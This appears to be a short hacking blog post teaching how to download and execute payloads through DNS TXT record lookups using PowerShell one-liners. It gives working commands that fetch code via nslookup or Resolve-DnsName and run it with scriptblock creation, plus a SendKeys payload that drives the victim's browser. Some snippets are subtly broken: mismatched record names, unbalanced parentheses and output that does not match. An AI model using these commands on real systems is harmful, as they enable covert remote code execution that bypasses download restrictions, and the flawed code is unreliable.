Skip to content

Dns Payloads

what is

Execute Dns Payloads: [ How it Works ]

This trick is usefull when you have access to your target but you have no habilitys to download anything.
Do you have thinking how the dns lookup works?
Yes there is always a way.
In this post i will show you how to download and execute payloads through dns lookup.

Attention

You shouldn't do this in a environment that you are not allowed to do.

Download payloads trough dns

first you need to create a new dns entry on your host like

type |       name         |          data
txt  | hello.example.com  |echo 'this is a payload through dns'

now you just need to use powershell to execute this payload

powershell . (nslookup -q=txt hello.example.com)[-1]

did you see it? how amazing it is?

now take a look at this example to extract tree lines from the dns domain records

lets say you have created 3 txt records like this:

name   |  data
hello     echo 'example 1'
from      echo 'example 2'
1337      echo 'example 3'
and using this payload:

1..3|%{$p+=Resolve-DnsName "$_hello.example.com." -Ty TXT |% S*s};& {[scriptblock]::Create($p))

the result would be 

 hello
 from
 1337

Attention

if you are using powershell on any other environment than "badwindows" you need to adjust your payload like this:

powershell 1..3|%{$p+=Resolve-DnsName \"$_.example.com.\" -Ty TXT |% S*s};& {[scriptblock]::Create($p))

spot the powershell and back slash's: you need to scape the quotes and at begin add "powershell" now lets take a look on this dns record.
Of course you can use your imagination for any other payloads.

Add-Type -A System.Windows.Forms;$o=New-Object-C WScript.Shell;Saps https://example.com;Sleep 3;[System.Windows.Forms.SendKeys]::SendWait('{TAB}{TAB}{ENTER}');Sleep 1;[System.Windows.Forms.SendKeys]::SendWait("%{F4}")